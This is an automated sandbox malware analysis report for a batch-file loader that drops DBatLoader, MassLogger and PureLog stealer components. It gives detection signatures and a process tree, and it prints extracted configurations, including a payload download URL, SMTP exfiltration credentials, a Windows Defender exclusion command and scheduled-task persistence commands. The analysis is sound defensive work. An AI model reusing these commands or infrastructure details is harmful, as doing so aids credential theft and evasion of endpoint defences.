Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#3_RKG367.bat

Overview

General Information

Sample name:PO#3_RKG367.bat
Analysis ID:1586924
MD5:deaa9cb6ee189b95d1ad718df32dac56
SHA1:ba94e1e97609cfa1bd102fe1087fc714875c6c25
SHA256:8f721d0dc987c60cb16a14ad166eab606b1b9401d6563241eb8ed359c24ad201
Tags:batuser-lowmal3
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Drops large PE files
Found large BAT file
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 3416 cmdline: findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cscript.exe (PID: 800 cmdline: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • x.exe (PID: 5776 cmdline: C:\Users\user\AppData\Local\Temp\x.exe MD5: E337ECD5680D121D6DD649956DC716CA)
      • cmd.exe (PID: 6684 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rpkhzpuO.pif (PID: 1012 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
        • Trading_AIBot.exe (PID: 4064 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 528 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 5236 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 6064 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • apihost.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 10751439BD30D4B3066935F2DFFDC3C7)
        • Microsofts.exe (PID: 1664 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
      • dllhost.exe (PID: 1012 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • Oupzhkpr.PIF (PID: 880 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: E337ECD5680D121D6DD649956DC716CA)
    • cmd.exe (PID: 6896 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 5824 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 5160 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: E337ECD5680D121D6DD649956DC716CA)
    • cmd.exe (PID: 4816 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 5280 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\Microsofts.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x101cd:$a1: get_encryptedPassword
        • 0x10509:$a2: get_encryptedUsername
        • 0xff5a:$a3: get_timePasswordChanged
        • 0x1007b:$a4: get_passwordField
        • 0x101e3:$a5: set_encryptedPassword
        • 0x11bb3:$a7: get_logins
        • 0x11864:$a8: GetOutlookPasswords
        • 0x11642:$a9: StartKeylogger
        • 0x11b03:$a10: KeyLoggerEventArgs
        • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\Microsofts.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000006.00000002.2536406675.000000007FAA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 23 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  10.1.rpkhzpuO.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
                  24.2.rpkhzpuO.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
                  24.2.rpkhzpuO.pif.31b93f56.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    24.2.rpkhzpuO.pif.343b0000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      24.2.rpkhzpuO.pif.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                      • 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                      • 0x1e9d0:$s5: delete[]
                      • 0x1de88:$s6: constructor or from DllMain.
                      Click to see the 49 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5776, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 1012, ProcessName: rpkhzpuO.pif
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 880, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6896, ProcessName: cmd.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 528, ProcessName: powershell.exe
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5776, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 1012, ProcessName: rpkhzpuO.pif
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 528, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 4064, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6064, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6064, ProcessName: schtasks.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 528, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-09T19:09:49.222732+010020283713Unknown Traffic192.168.2.64981341.185.8.252443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-09T19:09:58.095403+010028032742Potentially Bad Traffic192.168.2.649860158.101.44.24280TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: https://lwaziacademy.com/wps/200_OupzhkprnvwAvira URL Cloud: Label: malware
                      Source: https://lwaziacademy.com:443/wps/200_OupzhkprnvwAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAvira: detection malicious, Label: HEUR/AGEN.1326019
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1326019
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Found malware configuration
                      Source: 13.0.Microsofts.exe.350000.0.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
